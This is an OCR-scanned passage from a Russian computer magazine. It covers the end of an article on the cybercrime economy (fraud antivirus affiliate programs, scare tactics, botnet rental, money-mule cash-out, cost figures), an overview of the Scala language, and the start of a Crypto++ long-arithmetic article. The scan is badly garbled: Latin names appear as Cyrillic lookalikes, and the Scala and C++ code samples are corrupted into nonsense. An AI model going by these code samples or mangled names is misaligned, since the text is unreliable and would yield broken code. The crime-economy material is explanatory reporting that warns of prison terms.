компьютеров. После покупки трояна будущий 
владелец бот-сети обращается к тому самому 
взломщику, о котором говорилось выше, то есть 
«покупаеттрафик». Это означает, что взломщик 
за определенную плату обязуется загрузить 
переданный троян на компьютеры пользовате- 
лей через взломанный им сайтсустановленной 
связкой эксплойтов. Вредоносная программа 
попадает на компьютеры пользователей, пре- 
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Типичный фрауд-антивирус 

скрыты в тени партнерки, но зарабатывают столько, что 
им позавидует любой смертный. 



НА ВЕРШИНЕ КИБЕРКРАЙМА 



За партнерками обычно стоят производители фрауд- 
антивирусов, которые щедро делятся со своими 
адвертами прибылью. Вознаграждение доходит до 50%, 
особенно если адверт достаточно крупный. Средне- 
статистической малвари хватает одного-двух крупных 
партнеров, которые распространяют ее через свои сети. 



Отношения между главами двух этих видов бизнеса 
весьма доверительные, если не сказать больше. Ну а как 
тут не доверять, если суммы, которые они зарабатывают, 
редко содержат меньше шести нулей? 

Производитель фейкового защитного ПО берет на 
себя множество разных функций. В первую очередь он 
должен обеспечить свой софт качественными «сред- 
ствами убеждения». Другими словами, жертва должна 
расстаться со своими кровными в ближайшие пару 
часов после попадания зловреда на ПК. Сообразитель- 
ный пользователь может погуглить название софтины, 
которая пугает его сотнями троянов и червей, найденных 
у него на машине, и понять, что его пытаются надуть. 
Специально, чтобы это предотвратить, малварь запуги- 
вает юзера всеми возможными способами: показывает 
сообщения о приближающейся гибели его компьютера 
с потерей всех данных, меняет обои рабочего стола на 
киберапокалиптические узоры и надписи и так далее. 

В ход идут любые уловки, которые могут подстегнуть 
продажи. После введения той или иной запугивающей 
фичи киберзлодеи смотрят, как это повлияло на прода- 
жи. Если жертвы стали с меньшим сожалением расста- 
ваться со своими долларами, то нововведение остается 
в арсенале жуликов еще какое-то время — до тех пор, 
пока оно не потеряет свою кешегенерирующую мощь. 

Для наведения страха и ужаса используются самые 
разные трюки, и некоторые из них воистину вызывают 
восхищение своей простотой и элегантностью. Напри- 
мер, если производитель малвари знает, что его рекла- 
мят через порнотраф, то для стимуляции покупательской 
способности он может добавить в свой софт функцию 
слайд-шоу картинок из кеша браузера. Мало кто из лю- 
дей будет рад тому, что его близкие узнают о его тайных 
увлечениях. А если вспомнить, что в арабских странах 
за такие картинки могут запросто отделить голову от 
туловища, то эти несколько строк кода, демонстрирую- 



вращая их в ботов. Троян устанавливает связь 
с центром управления, передаеттуда различные 
сведения (об ОС бота, его антивирусе, использу- 
емом клиент-банке, наличие токена) и получает 
ответные команды. Таким образом формируется 
бот-сеть, которая используется ее владельцем 
для совершения хищений с банковских счетов. 
Однако тут стоит вернуться к Уголовному 
кодексу, который, как говорится, надо чтить. 
Владелец банковской бот-сети также наруша- 
ет статьи 272 и 273. Напоминаю: до семи лет 
лишения свободы! А мошенничество — это уже 
1 59 статья. И уже до десяти лет. Полагаю, следу- 
етхорошенько подумать, стоятли те деньги лет, 
проведенных за решеткой. 

ВТОРОЙ ПУНКТ БОЛЬШОГО ПУТИ: 

АРЕНДА БОТ-СЕТИ 

Итак, перейдем с внутреннего рынка кибер- 
преступности на рынок, связанный с интернет- 
мошенничеством. 

Банковский троян загружен на компьютеры 
пользователей и сообщает владельцу бот-сети 



о том, какие платежные системы там установ- 
лены. В принципе, владельцу ничто не мешает 
самому проводить мошеннические операции, 
если бы не одно «но»... Мало кто из владельцев 
хочет рисковать и сталкиваться с 159-й статьей. 
Для него безопаснее сдать бот-сеть в аренду 
и спокойно получатьсвой проценте похищен- 
ных средств. 

И вотуже недавний покупатель сам стано- 
вится продавцом. На хакерском форуме владе- 
лец дает соответствующее объявление. Если 
условия аренды подходящие, в скором времени 
появляется третье действующее лицо — за- 
ливщик, специализирующийся на проведении 
мошеннических операций. Арендуя бот-сеть, 
он получает определенный уровень доступа 
к центру управления. Казалось бы, все готово. 
Троян есть. Бот-сеть есть. Заливщик, которого 
будут искать сотрудники Управления экономи- 
ческой безопасности МВД, тоже есть. Но чего-то 
не хватает. 

Как я уже говорил ранее, в направление, 
связанное с интернет-мошенничеством, входят 



услуги по обналичиванию похищенных денеж- 
ных средств. Похитить деньги — это лишь часть 
преступного дела. В каждой хакерской группе 
есть так называемый дроповод — четвертое 
действующее лицо, которое организует вывод 
и обналичивание денежных средств. Ему-то 
заливщик и заказывает дроп-проект. Эта часть 
преступления настолько важна для мошенни- 
ков, что они готовы расстаться даже с 50% от 
суммы похищенных средств. 

Практика расследования киберпресту- 
плений показывает, что дроповод обычно 
имеетобширные связи в мире традиционных 
криминальных структур, у которых уже давно 
отработаны схемы отмыва «грязных» де- 
нег. Само собой, представители ОПГ помогут 
дроповоду не за спасибо. Этим и объясняется 
высокая стоимость дроп-проекта. Дроповод 
набирает дропов — низших пешек выстроенной 
нами преступной иерархии. Это люди, которые 
за фиксированную плату или процент будут 
обналичивать похищенные у кого-то денежные 
средства. 
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МАШАІІЕ 



ДЛЯ УДЕРЖАНИЯ УРОВНЯ 
ЗАРАБОТКА ВЛАДЕЛЬЦЫ 
ФРАУД АНТИСПАЙВАРЕ 
ПОСТОЯННО РЕБРЕНДЯТ 
СВОЙ СОФТ 



сколько стоит СОБРАТЬ СЕТЬ ЗАРАЖЕННЫХ 
КОМПЬЮТЕРОВ НА РЫНКЕ С2С? 




011 О 
101 
о 10 о 



о» лі 



щие в неубиваемом окне всю историю серфинга жертвы, 
могут подарить своему автору стабильный источник 
нефтедолларов из стран персидского залива. 

Разумеется, в этом деле главное — не переусерд- 
ствовать. Дело в том, что фрауд-антивири в большинстве 
своем имеют довольно хорошую юридическую защиту, 
обеспечиваемую мелким шрифтом ЕІЛА. Разумеется, 
эта защита не всесильна, поэтому их владельцы должны 
предусмотреть как минимум функцию анынсталла. Для 
продаж своего софта они используют вполне легальные 
биллинги, которые просто закрывают глаза на деятель- 
ность нечистых на руку клиентов. Если владельцев 
малварных антивирей отследить достаточно сложно, то 
люди, которые работают в биллинг-компании, обслу- 
живающей кибержуликов, могут поплатиться свободой. 
Поэтому производители такого рода ПО вынуждены 
играть по определенным правилам, которые обеспечи- 
вают им лояльность со стороны не слишком разборчивых 
контор, принимающих платежи за малварь. 

Для удержания уровня заработка владельцы фрауд 
антиспайваре постоянно ребрендят свой софт. Они 
меняют название, перерисовывают дизайн программы 
и сайта, меняют расположение кнопочек в пользователь- 
ском интерфейсе. Такой редизайн проводится раз в пару 



Типичный дизайн партнерки 



3000$- 

10 000$ 30$ 

непосредственно шифрование 

вредоносная исполняемых 

программа файлов 



250$ 

анонимный 

хостинг 



900$- 

3000$ 

покупка 
трафика 
в зависимости 
от запросов 
заказчика 



В любом случае цена преступного комплекта в среднем не превысит 10 000 долларов. 
Получается экономная покупка, учитывая, что с помощью этой бот-сети можно 
зарабатывать сотни тысяч долларов в месяц. По версии УК РФ: Владелец банковской 
бот-сети нарушает статьи 272 и 273. До семи летлишения свободы. Мошенничество — 
это уже 159-я статья. До десяти лет. 



Приблизительные 
финансовые показатели рынка 
киберпреступности будоражат 
воображение: двенадцать 
с половиной миллиардов 
долларов, из которых треть 
досталась выходцам из стран 
бывшего Советского Союза. 



месяцев и является необходимой мерой, поскольку через 
некоторое время интернетуже просто кишит сообщения- 
ми, что очередной ВирегѴѴіпАпІіѵіг совсем не то, за что 
себя выдает. Помимо этого кодеры должны постоянно 
заботиться о том, чтобы их детище не попадало в базы 
к настоящим антивирусам, которые с большой радостью 
сносят с компьютера жертвы все их труды. 

На плечи малваре-миллионеров ложатся и всевоз- 
можные издержки. Глупо полагать, что все отнятое 
у невинных юзеров достанется тебе целиком. Многие 
понимают, что их обманули, и делают рефанды и чар- 
джбэки. Часто эти деньги берутся из доли производителя 
вредоносного софта, а часть адвертов остается нетро- 
нутой, так как потеря канала распространения означает 
потерю всего бизнеса. Владелец партнерки можетуйти 
к более рефандоустойчивому киберкриминалитету. Не 
исключено, что биллинг, обслуживающий биз, может 
закрыться и кинуть своих партнеров на деньги. Такое 
случается чаще, чем может показаться. В этом случае 
владельцы империи компенсируют недостающую сумму 
из своего кармана, а это зачастую не десятки и даже не 
сотни тысяч долларов. Но что поделаешь — если ты не 
хочешь терять свой биз, то надо платить партнерам. 



ЗАКЛЮЧЕНИЕ 



Люди, работающие в малвари, зачастую очень талантли- 
вы как в бизнесе, так и в ІТ. Благодаря умению заводить 
правильные знакомства и чувствовать мировые тренды 
в киберкрайме они зарабатывают миллионы долларов. 
Их бизнес-империи построены ими с нуля. У них не было 
богатых или влиятельных родителей, которые протал- 
кивали свое чадо вперед. Чтобы пробить себе дорогу 
в светлое будущее, они, еще совсем молодые, работали 
по 14 часов в сутки, когда их сверстники вовсю на- 
слаждались жизнью. Их таланты могли бы послужить 
человечеству, если бы они начали делать не зловредов, 
а, например, свой РасеЬоок или Тѵѵіиег, но, к сожалению, 
выбранная ими дорога вела на темную сторону. 
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АКАДЕМИЯ 
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ШК0ЛАНІ6НЮА0 

Можноли в рамках одной, даже большой 
статьи раскрытьсложнуютему?Увы, нет! 
Устав от постоя иного чувства недоска- 
занности, мы запускаем циклы темати- 
ческих публикаций, который открывает 
наша Школа НідЫоасІ. В ближайших 
шести номерахчетыре гуру-инструктора, 
которые изо дня в деньзанимаютсятем, 
чтобы сайты не падали под наплывом 
пользователей и выдерживали баснос- 
ловные нагрузки, будут делиться своими 
знаниями идаватьрекомендации, как 
надо строить «свой РасеЬоок». Личный 
опыт,типичныеошибки, конкретные под- 
ходы, известные приемы итехники — все 
в одном большом цикле материалов. 




кодинг 



иміхот 






5СА1А-К0ДИНГ 




ВСЕ ГЕНИАЛЬНОЕ ПРОСТО 




76 


Несмотря на всюсилу^VМ,самязык^аѵа 
в последние годы сдает позиции. Но его 


106 


Еслитебя неустраивает сложный, раз- 
дутый и полный ошибоксофт,тосамое 


110 



недостатки готовы исправитьальтерна- время перейти на сохранившие простоту 

тивные языки, и прежде всего Бсаіа. разработки от проекта зискіезз.огд. 



ВЫДЕРЖАТЬ НАТИСК 

Вирусы, бэкдоры, кейлоггеры и 
уязвимости АпсІгоісІ — как появилась 
малварьдля мобильной платформы от 
боодіе и как от нее защититься? 



5УН/АСК 



РЕЯяим 






ВРАГУ ВОРОТ, или ВЫБИРАЕМ ОТМ 




ЗНАКСООТВЕТСТВИЯ 




116 


Файрвол с глубоким анализом пакетов, 
система защиты от вторжений, антиспам. 


128 


РАОпосертификации МісгозоЙ, при- 
правленныйсубъективным мнением 


134 



антивирус и контентная фильтрация — человека, которыйсдал неодинэкзамен и 

суперкомбо, которое называется ІЯМ. последние пять лет работает в этой сфере. 



ДОБРО ПОЖАЛОВАТЬ В КЛУБ! 

Из какого железа сегодня можносо- 
братьтоповый компьютер?Что касает- 
ся материнки — это точно должна быть 
плата на 1п1е1Х79 Ехргезз! 
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кодинг 



Олег Галако (іѵѵіиег.согп/оіоѵѵоо) 




КОДИ н г 

ЧТО ПРЕДСТАВЛЯЕТ 
СОБОЙ ЯЗЫК5СА1А 
И ПОЧЕМУ О НЕМ НУЖНО 
ЗНАТЬ КАЖДОМУ, КТО 
СЕРЬЕЗНО ОТНОСИТСЯ 
К ПРОГРАММИРОВАНИЮ 



5са1а — не только язык для тех, кто давно 
программирует на ^аѵа и хочет большей 
выразительности и эффективности, но и просто 
интересный, по-настоящему свежий язык, где 
впервые удачно скомбинированы несколько парадигм 
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и методов программирования. Предлагаю твоему 
вниманию краткий обзор самого языка и нескольких его 





5СА1А-К0ДИНГ 



ЕЩЕ ОДИН ЯЗЫК НА^VМ?| 

Платформа ^VМ (^аѵа Ѵігіиаі МасЫпе), безусловно, одно из вели- 
чайших достижений программистской мысли и один из столпов 
ІТ-промышленности. Но сам язык ^аѵа за последние несколько 
лет заметно отстал в развитии. Поэтому на ^VМ стали массово по- 
являться самые различные альтернативные языки. Среди них 5са1а 
выделяется по-настоящему основательным подходом и нацелен- 
ностью на самые серьезные проблемы, с которыми столкнулась ІТ- 
индустрия в последние годы. Язык начали создавать более десяти 
лет назад в лаборатории швейцарского института ЕРРІ, и за эти 
годы в 5са1а было включено немало уникальных концепций, яв- 
ляющихся результатом настоящих научных исследований. Поэтому 
язык 5са1а может быть интересен не только тем, кто программирует 
на ^аѵа и кому уже просто обидно смотреть, как далеко ушли в раз- 
витии другие технологии, но и всем, кому небезразличны свежие 
идеи в программировании, подкрепленные серьезным научным 
подходом, а не просто модными трендами. 

Ключевые особенности языка: 

1 . Основная платформа — ^аѵа Ѵігіиаі МасЫпе, свободная инте- 
грация с ^аѵа-проектами и библиотеками, ведется работа над 
портированием на .МЕТ и ЕЕѴМ. 

2 . Близкий к ^аѵа синтаксис, что еще более упрощает миграцию. 

3 . Мощная статическая типизация и вывод типов, что позволяет 
писать надежный код без громоздких конструкций. 

4 . Объединение функционального и объектно-ориентированного 
подхода, делающее язык масштабируемым по двум направле- 
ниям — от простого к сложному и от однопоточности к распре- 
деленности. 

Примеры кода 

// Сумма чисел от 1 до 100 

(1 ІІО 100). 5ит 



// Результат - строка "2.6" 

2. 3).б1 1:ег(_ % 2 == 1).тар(_ * 2) .тк51:гіп§("/') 



// Количество чисел до миллиона с суммой цифр, равной 42 

// Автоматическое распараллеливание вычисления 

(1 -Со 1ѲѲѲ0ѲѲ) .раг.соип1і(_.1:о$1:гіп^.тар(_.а5Рі^і1: ^ .5ит == 42) 



// "Взрослое" ООП: смешивание 1:г аі1:'*ов (множ ественное 
// на следование), ко- и контрава риантность. указание 

// типа "ІІІ1І5" 

1ігаі1: МѵРипс1ііоп[-А. +В] ехііепсіз (А => В) 

ЫІІІІ 1 Іо§^іп§ ЫІІІІ 1 Ѵаіісіаіііо п { 

ІІІ1І5: МѵСоп1іех1: => 



ИСТОРИЧЕСКАЯ СПРАВКД 

Разработке Бсаіа предшествовали несколько эксперименталь- 
ных языковых проектов Мартина Одерски, один из которых, 
Оепегіс ^аѵа, был взят за основу поддержки типов-параметров 
в ^аѵа 1.5. Ключевой идеей нового языка было объединение 
функционального и объектно-ориентированного подходов для 
достижения масштабируемости — когда одни и те же конструк- 
ции одинаково эффективны и в очень больших, и в маленьких 
программах. Работа над Бсаіа началась в 2001 году, в 2003-м 
появилась первая версия, но широкий практический интерес 
к языку проснулся только спустя несколько лет, после серии 
основательных переработок. 

Сейчас уже совершенно очевидно, что язык готов для серьез- 
ного промышленного использования, чем успешно занимаются 
такие компании, как Роигзриаге, Тѵѵіиег, ЫпкесІІп и другие. 
Особый интерес к языку проявляют разработчики банковских 
систем — из-за высокой надежности статической типизации 
и платформы ЗѴМ и нацеленности на высокие нагрузки и распре- 
деленные вычисления. 




5са1а ШЕ — плагин для Есіірзе для работы со Зсаіа 

В мае 2011 года для коммерческой поддержки и развития 
языка была создана компания ТурезаІ'е, в которую сразу были 
приглашены самые яркие фигуры Бсаіа-сообщества. Среди про- 
чего компания занимается разработкой пакета инструментов под 
названием Турезаі'е Біаск, в который, кроме самого языка, входит 
система сборки проектов 5ВТ, интерактивная среда разработки 
Бсаіа ЮЕ, веб-фреймворк РІау и библиотека для создания и под- 
держки распределенных систем Акка. Этой весной вышла уже его 
вторая версия. 

ПОДРОБНЕЕ О ВОЗМОЖНОСТЯХ 

Рассмотрим поближе несколько наиболее понятных и эффектив- 
ных концепций, реализованных в Бсаіа. Многие из них давно уже 
есть в других языках и не являются техническими новшествами, но 
есть и такие, у которых пока нет аналогов. 

Вывод типов и удобная инициализация: 

ѵаі 1І5 І: = ІІ5І;("а"^ "Ь"^ "с")//ІІ5І:[51:гіп§] 

ѵаі тар = Мар(1 -> "а"^ 2 -> "Ь"^ 3 -> "с")//Мар[Іп1:^ 51:гіп§] 

Классы для данных — сазе сіаззез, включают в себя автомати- 
чески генерируемые методы ериаіз, ЬазЬСосІе, ІоБігіпд и другие: 

ІІ5ег(пате: 51;гіп§^ а§е: Іп1;^ асісігезз: Асісігезз) 

* Асісіге55(сі1;у: 51;гіп§д з1;гее1;: 51;гіп§) 
р = Рег50п("Ѵазіа"^ "21"^ Асісігезз ( "Мозсоы"^ "АгЬаІ;")) 

Мощнейшая функциональная библиотека коллекций (обрати 
внимание, что ни один тип нигде не указан, но на самом деле везде 
присутствует строгая статическая типизация): 

// Результат: Ві1:5е1:(2^ 4^ 6)^ сохранен класс коллекции 
Ві1;5е1;(1д 2 , 3).тар(_ * 2) 



// Результат: 5е1:("2". "3". "1"). ближайший валидный 

// класс - $е1і. так как строки не могут храниться в Ві1:5е1: 
Ві1і$е1:(1. 2. 3).тар( .1:о$1:гіп^) 



// Результат: Мар, в котором числа от 1 до 100 
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// сгруппированы по сумме цифр 

(1 100) .§гоирВу(_.1;о51;гіп§.тар(_.а50і§і1;) .зит) 

Неявные преобразования, в частности, позволяют «добавить» 
методы к любому существующему классу, давая возможность 
писать код вида: 

ѵаі і = // "1" - это обычный іаѵа. 1ап^.$1ігіп^ 

ѵаі с іаііе = Ііосі ау + І .ш опіі іі + Б.сіаѵз 

дгіпі1п("%5 - %сі" .-Рогта1;("Ѵа5Іа" ^ 21)) 

Кортежи (іиріез) позволяют удобно работать с группами значе- 
ний фиксированных типов: 

сіе-р еггог = ("Мо1і -РоипсІ". 404) 

// определение метода 

(тз^. сосіе’) = еггог 

// определение и инициализация переменных 

Именованные параметры и параметры по умолчанию делают 
ненужным огромное количество Іаѵа-кода с перегруженными 
методами: 

сІе-Р Ьох(ыісІ1:Іі: Іп1: = 100, беі^іті:: Іп1: = 200) = { /*...*/ > 
ЬохРІіеі^ІгІ: = 300) // эквивалентно вызову Ьох(100, 300) 

«Ленивая» инициализация: 

а 2 ѵ ѵаі с|а1:а = Раг зеНи^еРіІеО 

// выполнится только при первом доступе 

Параметры, передающиеся по имени (а не по значению, то есть 
вычисляются только при необходимости): 

сІеЬи§(тз§: => 51:гіп§) = (сІеЬи§ЕпаЫесІ) ргіп1;1п(тз§) 
// РіеаѵуМеІіІіосІ вызовется^ только если сІеЬи§ЕпаЫесІ 
сІеЬи^С'РеЬи^ шезза^е: " + беаѵѵМеІіІіосІП ) 

Структурные типы (необходимые сигнатуры методов можно 
перечислить прямо на месте): 

с1озеКезоигсе(гезоигсе: { с1озе() }) 

{ гезоигсе. сІозеП } 

Программируемое сопоставление с образцом (раиегп таІсЫпд) 
— можно писать свои алгоритмы разбора и потом комбинировать 
их, очень удобно: 

ѵаі -рітеКе^ех = "(\\сІІ2>) : (\\сІІ2>) : (\\сІ{2>) " . г 

зошеУаг шаіісіі { 



ВНИМАНИЕ ПОТЕНЦИАЛЬНЫХ 
ПОЛЬЗОВАТЕЛЕЙ ПРИВЛЕКАЕТ 
УЖЕ НЕ ТОЛЬКО САМ ЯЗЫК, НО 
И СОПУТСТВУЮЩИЕ БИБЛИО- 
ТЕКИ И ФРЕЙМВОРКИ, ТЕМ 
БОЛЕЕ ЧТО У НЕКОТОРЫХ ИЗ 
НИХ ИМЕЕТСЯ ^АVА-ИНТЕРФЕЙС 



сазе 1:ітеКе§ех(ІіІі. шш. зз) => ргіп1і1п(іііі . шш. зз) 

сазе Ііз1:('а. Ііз1:(1. Ь)) => ргіп1і1п(а. Ь) 

сазе _ => // сІе-Раи11: 

} 

Это то, что лежит на поверхности и легко продемонстрировать, 
есть еще много интересных инструментов, делающих программи- 
рование на 5са1а действительно приятным и эффективным. Тем, 
кому интересно познакомиться с языком поближе, рекомендуется 
прежде всего начать с книги от создателей языка — «Ргодгаттіпд 
іп 5са1а» (2'"'^ есІіЛоп). Далее можно перейти к конкретным вопро- 
сам с использованием поиска на зІаскоѵегЛоѵѵ.сопп и тематическим 
доодіе-группам. 

К сожалению, информации по Бсаіа на русском языке пока что 
практически нет. 

ЧТО можно с этим СДЕЛАТЬ? 

По мере «взросления» языка стали появляться и серьезные 
фреймворки и библиотеки. Одним из самых ярких примеров ран- 
них 5са1а-фреймворков является ЫЙ. Его создатель попытался 
взять все лучшее из самых удачных инструментов для создания 
веб-приложений — ѴѴіскеІ, Раііз, 0)апдо и других. Получилось 
довольно хорошо, хотя и запутанно. Те, у кого хватило терпения 
и знаний разобраться во всем многообразии средств, предла- 
гаемых ЫЙ, смогли извлечь из него немалую выгоду. Например, 
компания Роигздиаге, которая перевела свой проект с РНР на 
ЫЙ, до сих пор успешно развивается и держит высокие нагруз- 
ки. Но по мере того, как становилось все яснее, что фреймворк 
получился сложный, у его создателя падал к нему интерес, и на 
данный момент он практически им не занимается. При этом 
нельзя сказать, что проект остановился в развитии, — появились 
желающие продолжить разработку, но после включения другого 
веб-фреймворка (РІау) в главный пакет 5са1а-инструментов стало 
понятно, что лучшие времена ЫЙ, пожалуй, позади. 

Веб-фреймворк РІау, по словам Мартина Одерски, был вклю- 
чен в состав ТурезаІ'е 5іаск по одной несложной причине: его 
создатели считают своим основным приоритетом простоту раз- 
работки, даже если для этого им потребуется проделать большую 
работу («ѴѴогкіпд ЬагсІ Іо кеер зіітіріе»). Изначально это был 
весьма инновационный Іаѵа-веб-фреймворк, главным приорите- 
том которого было удобство разработки. Например, в нем поддер- 
живается автоматическая компиляция после изменений и отчет 
об ошибках прямо в браузере, что сильно сокращает цикл раз- 
работки, — очень важный параметр для веб-приложений на Іаѵа, 
которые славятся своим гигантским временем развертывания. 

Вторая версия была уже полностью переписана на 5са1а, так 
как, по словам разработчиков, язык содержит многие концепции 
и инструменты, которые использовались в РІау, но были громозд- 
кими и неудобными в Іаѵа. Важной особенностью фреймворка 
является реактивная неблокирующая архитектура. Другими сло- 
вами, ваш код вызывается только тогда, когда необходимые дан- 
ные от пользователя приняты, и только тогда, когда пользователь 
готов принять данные, что позволяет освободить вычислитель- 
ные ресурсы и увеличить максимальные допустимые нагрузки. 
Кроме того, РІау следует зіаіеіезз-принципу «не хранить лишнего 
в памяти», что автоматически дает дополнительные преимуще- 
ства при масштабировании в распределенных системах. 

Еще одним из старейших Всаіа-фреймворков является Акка — 
набор инструментов для разработки распределенных систем. Не 
так давно в составе ТурезаІ'е Віаск 2.0 вышла его новая, основа- 
тельно переработанная версия. Если изначально в Акка просто 
переносили наработки языка Егіапд в области архитектуры, 
основанной на Асіог'ах, то сейчас это уже проверенная време- 
нем библиотека со множеством интересных решений. Например, 
в ней реализованы методы работы с 5ТМ (ВоЙѵѵаге Тгапзасііопаі 
Метогу), позволяющие создавать комбинируемые многопоточные 
алгоритмы, что во многих случаях полностью снимает осложне- 
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ния, связанные с сіеасііоск'ами и другими схожими проблемами 
параллельного доступа к ресурсам. Кроме того, в наличии имеют- 
ся реализации концепций ОаІаПоѵѵ Сопсиггепсу, распределенных 
конечных автоматов, шины событий и так далее. 

Асіог'ы в Акка прошли достаточно длинный путь эволюци- 
онного развития и сейчас устроены так, что для программиста 
нет никакой разницы, где именно расположен конкретный 
Асіог — локально или на удаленном узле — и каким образом ему 
посылаются сообщения. С помощью изменения конфигурации 
можно перенести часть функциональности на другую машину, 
библиотека сама позаботится об оптимальном способе доставки 
сообщений, обработке ошибок и управлении жизненным циклом 
объектов. При этом сами Асіог'ы максимально компактны, а дис- 
петчеры доставки оптимизированы по быстродействию, что по- 
зволяет достигать рекордной скорости обработки сообщений. 

С ростом интереса к языку растет и количество библиотек, 
написанных на нем. Зачастую они появляются в открытом доступе 
благодаря компаниям, использующим Зсаіа в своих коммерче- 
ских проектах. Здесь безусловными фаворитами являются Тѵѵіиег 
и Роигзриаге. 

Таким образом, в последнее время внимание потенциальных 
пользователей привлекает уже не только сам язык, но и сопут- 
ствующие библиотеки и фреймворки, тем более что у некоторых 
из них (как РІау или Акка) имеется и ^аѵа-интерфейс. 

БУДУЩЕЕ 

Как бы ни было важно для промышленного использования удер- 
живать язык в стабильном состоянии, окруженный талантливыми 
энтузиастами, он неудержимо стремится к совершенствованию 
и развитию. В конце апреля вышел очередной тііезіопе-релиз 



будущей версии Зсаіа 2.10, в который включены несколько очень 
серьезных нововведений, сильно меняющих подходы ко многим 
старым проблемам. Например, макросы, основным идеологом 
и разработчиком которых, кстати, является «наш человек» — 
Евгений Бурмако из Минска. Изначальная идея Зсаіа-макросов 
заимствована из языка Метегіе, но она не только адаптирована 
и доработана, но и использует некоторые находки, нигде до этого 
не применявшиеся. 

Если коротко, макросы — это почти что обычные Зсаіа- 
функции, которые оперируют с кодом на уровне структур данных 
компилятора. На настоящий момент они могут просто заменять 
собственный вызов на произвольное синтаксическое дерево 
(что уже открывает очень много возможностей), а в дальнейших 
планах — генерация классов и многое другое из того, что умеет 
компилятор. Самым очевидным и долгожданным применением 
макросов является возможность преобразования выражений 
с коллекциями в запросы к базе данных, что уже было реали- 
зовано, например, в МісгозоЙ ЫМО. Но содержащийся в Бсаіа 
широчайший спектр инструментов — от класса Оупаппіс, по- 
зволяющего вызывать произвольный метод (как в динамическом 
языке), и структурной типизации до смешивания Ігаіі'ов и вло- 
женных типов — с макросами увеличивает свою мощность в разы, 
давая программисту возможность манипулировать всем этим по 
своему усмотрению. Казалось бы, такое серьезное нововведение 
вполне тянет на версию 3.0, но у Мартина Одерски есть еще более 
революционные планы, для которых он придерживает цифру 3, 
причем эти планы связаны не с добавлением новых концепций, а, 
наоборот, с объединением и обобщением старых, что и является 
основной идеей языка. 

Ну что ж, поживем — увидим. ^ 




Исходники РІау в 5са1а ШЕ 



РАУІ РНІШР5 АКА ООТ-СОМ 



Любопытный факт: второй человек (после создателя языка) в 5са1а- 
сообществе Пол Филлипс — бывший знаменитый игрок в покер, 
известный в тех кругах под псевдонимом Ооі-Сот. Заработав 
(согласно Википедии) больше двух миллионов долларов на покере. 
Пол решил, что теперь можно заняться чем-то для души. И... стал 
активно участвовать в разработке Зсаіа, присылая огромное 
количество патчей с исправлениями и доработками. Сейчас он один 
из соучредителей Туреза^е и, вполне возможно, разбирается во 
внутренностях компилятора лучше самого Одерски. 



5СА1А 0АѴ5 2012 



В апреле в Лондоне прошла очередная ежегодная конференция 
Зсаіа-разработчиков, собравшая в этот раз более 500 человек со 
всего мира. Доклады шли параллельно в четырех больших залах 
центра ВагЬісап в течение двух дней. Темы докладов были хорошим 
доказательством широкого спектра применимости языка — от 
глубоких научных изысканий в области параллельных вычислений 
и теории типов до рассказа 12-летнего мальчика об использовании 
Зсаіа для создания простых игр. Как часто бывает в таких случаях, 
многие компании прислали своих представителей для «вербовки» 
специалистов. Оказалось, что спрос на Бсаіа-разработчиков растет 
быстрее, чем предложение. По данным іпсіеесі.сот. количество 
Зсаіа-вакансий выросло за 2011 год в три раза. 
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ИЗБИРАЕМСЯ С/РЕАЛИЗАЦИЕИ 
ІДЛИННОЙ АРИФМЕТИКИ 
В СКУРТО+#Й АЛГОРИТМОМ Р5А 



Длинная 

арифмети 

вкриг да 



При программировании большинства систем 
с открытым ключом, схем электронной 
цифровой подписи (в том числе на 
эллиптических кривых) зачастую возникает 
задача реализации длинной арифметики — 
операций с числами, длина которых превышает 
длину регистра процессора. В данной статье 
мы рассмотрим, как реализована длинная 
арифметика в популярном криптографическом 
фреймворке Сгур1:о++, а также сами 
запрограммируем алгоритм шифрования 
РаѵѵРЗА при помощи этого фреймворка. 



Ш5К 


Ргерг&с^&^іпЁ 


1 


В5А 


л 

’Й 

Э‘ 

т 

ж 


кс-Ѵ 







Схема использования Р5А на практике 



еализация длинной арифметики — задача весьма рас- 
пространенная. Большинство протоколов распреде- 
ления ключей, схем ЭЦП, шифров с открытым ключом 



используют в том или ином виде операции умножения больших 
чисел, возведения их в степень, деление с остатком (приведе- 
ние по модулю). В качестве примеров подобных криптографи- 
ческих примитивов можно отметить всем известный алгоритм 
шифрования Р5А, протокол распределения ключей Диффи — 
Хеллмана, схемы ЭЦП Шнорра и Эль-Гамаля — все они использу- 
ют операции возведения чисел в степень и деления с остатком. 
Операции с большими числами реализованы во всех популярных 
криптографических фреймворках, кроме того, некоторые языки 
программирования (например, РуОпоп) поддерживают длинную 
арифметику из коробки. Сейчас мы посмотрим, как данные опе- 
рации реализованы в популярном фреймворке Сгур1о++. 



КЛАСС ЧИСЛА 

За представление большого числа в Сгур1о++ отвечает класс 
Іпіедег, в котором число представляется в виде массива элементов 
типа ѴѴОРО, а также флага, отвечающего за знак числа (положи- 
тельное или отрицательное). Так как Сгур1о++ является крипто- 
графическим фреймворком, то для выделения памяти под данный 
массив используется специальный аллокатор, который перед тем, 
как освободить память, безопасно удаляет всю имеющуюся в памя- 
ти информацию. Операция сложения реализуется довольно просто: 
производится сложение соответствующих элементов массива, при 
этом не забывается про перенос из младших разрядов в старшие. 
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Длинная арифметика в криптографии 



ІПІ: СКУРТ0РР РА5ТСА11 ВазеІіпе АсІсК 
5І2Ѳ 1: 

ыогсі *С. // результат 

СОП5І: ыогсі *А. // число А 

СОП5І: ыогсі *В) // число В 



а55ег1: (М%2 == ѲѴ. 

// Объ явление двух переменных типа ЫОКР 

Рес1аге21лІогсІ5('и’) ; 

// Обнуление пер еменных и 

А5 5І^п1лІогсІ(и . ѲѴ. 

// Выполнение сложения 

-Рог (5І2е_1: і=0: і<М: і+=2^ 

{ 

АсІсІ1лІі1:ІіСаггу(и^ А[і] ^ В[і] ); 

С[і] = ІоыІлІогсКи V. 

АсІсІ1лІі1:ІіСаггѵ(и. А[і+1], В[і+1]Ѵ, 

С[і+1] = ІоыІлІогсІГи V. 

геііцгп іп1:(6е1:Саггѵ(и^^ : 

} 

В операции вычитания также нет ничего особенного — все 
сводится к операциям с положительными числами, для которых 
предусмотрены вспомогательные І^гіепсІ-функции РозіІіѵеВиЬзІгасІ 
и РозіІіѵеАсІсІ. В их работе тоже ничего выдающегося — все опе- 
рации проводятся в соответствии с известным любому школьнику 
алгоритмом сложения или вычитания в столбик. Гораздо интерес- 
нее операция умножения. 

ОПЕРАЦИЯ УМНОЖЕНИЯ 

Для реализации операции умножения известно множество ал- 
горитмов, перечень которых начинается с умножения в столбик 
и заканчивается алгоритмами Анатолия Карацубы, Тоот — Соок 
